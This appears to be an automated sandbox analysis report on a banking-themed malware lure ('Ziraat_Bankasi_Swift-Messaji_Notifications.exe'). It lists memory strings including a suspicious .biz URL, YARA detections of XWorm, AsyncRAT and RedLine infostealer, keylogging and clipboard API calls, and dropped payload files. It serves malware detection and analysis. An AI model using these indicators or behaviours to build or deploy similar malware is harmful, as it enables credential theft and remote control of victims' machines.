Source: alg.exe, 00000002.00000003.1322367769.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1771772723.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1986704664.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1559227442.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1340496189.00000000004BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz:80/uhxgrttve?usid=25&utid=9755593280PU
Source: powershell.exe, 00000015.00000002.1539783861.000001DD846A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: alg.exe, 00000002.00000003.1439852307.0000000001550000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: powershell.exe, 0000000E.00000002.1397307978.000001FEA60D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1539783861.000001DD84481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: RegSvcs.exe, 00000009.00000002.1311146517.0000000003E63000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1311146517.0000000003F3C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1311146517.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000A.00000000.1301567190.0000000000EF2000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: alg.exe, 00000002.00000003.2038298699.0000000001450000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: alg.exe, 00000002.00000003.1550726071.0000000001550000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxFailed
Source: alg.exe, 00000002.00000003.1551610424.0000000001550000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1551415000.0000000001550000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
Source: powershell.exe, 00000015.00000002.1614630556.000001DD944F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000015.00000002.1614630556.000001DD944F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000015.00000002.1614630556.000001DD944F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: alg.exe, 00000002.00000003.2038429513.0000000001450000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: powershell.exe, 00000015.00000002.1539783861.000001DD846A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: alg.exe, 00000002.00000003.2038532715.0000000001450000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: alg.exe, 00000002.00000003.2038532715.0000000001450000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1
Source: alg.exe, 00000002.00000003.2038004148.0000000001450000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: powershell.exe, 0000000E.00000002.1437482472.000001FEB6143000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1614630556.000001DD944F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: alg.exe, 00000002.00000003.1347358368.00000000014D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.7-zip.org/

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00474164

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00474164

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00473F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00473F66

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_0046001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_0046001C

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_0048CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0048CABC

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.RegSvcs.exe.2e60d94.4.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.2e60d94.4.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.niellist.exe.4000000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.2.niellist.exe.4d10000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.RegSvcs.exe.2e57738.2.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.2e57738.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 9.2.RegSvcs.exe.3eaebc0.8.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.3f45010.6.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.3ef9df0.9.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.2e57738.2.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.2e57738.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 9.2.RegSvcs.exe.2e60d94.4.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.2e60d94.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 9.2.RegSvcs.exe.3f45010.6.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 10.0.build.exe.ef0000.0.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.2e4e0f4.3.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.2e4e0f4.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.0.XClient.exe.cf0000.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 11.0.XClient.exe.cf0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 9.2.RegSvcs.exe.3ef9df0.9.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 00000009.00000002.1304482234.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000011.00000002.1415424973.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000003.00000002.1302912222.0000000004000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000000.1302946369.0000000000CF2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00403B3A
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1271710089.00000000004B4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_20f5931f-3
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1271710089.00000000004B4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_b2fc1c23-a
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1262264862.00000000041C3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_14cc24f3-2
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1262264862.00000000041C3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_e18844d4-5
Source: niellist.exe, 00000003.00000002.1291644202.00000000004B4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_b90dfd7b-4
Source: niellist.exe, 00000003.00000002.1291644202.00000000004B4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_574a7881-b
Source: niellist.exe, 00000011.00000002.1407658535.00000000004B4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_bd2db06b-0
Source: niellist.exe, 00000011.00000002.1407658535.00000000004B4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_e6f7d0dc-3

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_0046A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_0046A1EF

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00458310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00458310

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_004651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_004651BD

Source: C:\Windows\System32\alg.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\a8259331cca430bb.bin

Jump to behavior

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0040E6A0	0_2_0040E6A0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0042D975	0_2_0042D975
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_004221C5	0_2_004221C5
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_004362D2	0_2_004362D2
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_004803DA	0_2_004803DA
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0043242E	0_2_0043242E
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_004225FA	0_2_004225FA
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0045E616	0_2_0045E616
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_004166E1	0_2_004166E1
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0043878F	0_2_0043878F
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00436844	0_2_00436844
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00480857	0_2_00480857
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00418808	0_2_00418808
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00468889	0_2_00468889
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0042CB21	0_2_0042CB21
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00436DB6	0_2_00436DB6
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00416F9E	0_2_00416F9E
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00413030	0_2_00413030
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0042F1D9	0_2_0042F1D9
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00423187	0_2_00423187
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00401287	0_2_00401287
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00421484	0_2_00421484
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00415520	0_2_00415520
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00427696	0_2_00427696
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00415760	0_2_00415760
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00421978	0_2_00421978
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0055BCC8	0_2_0055BCC8
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0040FCE0	0_2_0040FCE0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00487DDB	0_2_00487DDB
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00421D90	0_2_00421D90
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0042BDA6	0_2_0042BDA6
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0040DF00	0_2_0040DF00
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00413FE0	0_2_00413FE0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00B100D9	0_2_00B100D9
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AD6EAF	0_2_00AD6EAF
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AD51EE	0_2_00AD51EE
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00B0D580	0_2_00B0D580
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00B03780	0_2_00B03780
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00B0C7F0	0_2_00B0C7F0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00B139A3	0_2_00B139A3
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00B05980	0_2_00B05980
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AD7B71	0_2_00AD7B71
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AD7F80	0_2_00AD7F80
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00D71360	0_2_00D71360
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00AE39A3	3_2_00AE39A3
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00AD5980	3_2_00AD5980
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00AA6EAF	3_2_00AA6EAF
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00AA51EE	3_2_00AA51EE
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00ADD580	3_2_00ADD580
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00AA7F80	3_2_00AA7F80
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00AD3780	3_2_00AD3780
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00ADC7F0	3_2_00ADC7F0
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00CEA410	3_2_00CEA410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00408C60	9_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040DC11	9_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00407C3F	9_2_00407C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00418CCC	9_2_00418CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00406CA0	9_2_00406CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004028B0	9_2_004028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041A4BE	9_2_0041A4BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00418244	9_2_00418244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00401650	9_2_00401650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00402F20	9_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004193C4	9_2_004193C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00418788	9_2_00418788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00402F89	9_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00402B90	9_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004073A0	9_2_004073A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_02860FE0	9_2_02860FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_02861030	9_2_02861030
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 10_2_017DDC74	10_2_017DDC74
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 10_2_057EEE58	10_2_057EEE58
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 10_2_057E8850	10_2_057E8850
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 10_2_057E0040	10_2_057E0040
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 10_2_057E0007	10_2_057E0007
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 10_2_057E8840	10_2_057E8840
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_0099CA20	12_2_0099CA20
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_0099AA63	12_2_0099AA63
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_00998789	12_2_00998789
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_009BA810	12_2_009BA810
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_009979F0	12_2_009979F0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_009B92A0	12_2_009B92A0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_009B93B0	12_2_009B93B0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_00997C00	12_2_00997C00
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_009C2D40	12_2_009C2D40
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_009BEEB0	12_2_009BEEB0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 13_2_00CD7C00	13_2_00CD7C00
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 13_2_00CFA810	13_2_00CFA810
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 13_2_00CD79F0	13_2_00CD79F0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 13_2_00D02D40	13_2_00D02D40
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 13_2_00CF92A0	13_2_00CF92A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 13_2_00CFEEB0	13_2_00CFEEB0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 13_2_00CF93B0	13_2_00CF93B0
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_00AFC668	17_2_00AFC668
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_0340515C	17_2_0340515C
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_033C6EAF	17_2_033C6EAF
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_033F5980	17_2_033F5980
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_033C51EE	17_2_033C51EE
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_034039A3	17_2_034039A3
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_033C7F80	17_2_033C7F80
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_033F3780	17_2_033F3780
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_033FC7F0	17_2_033FC7F0
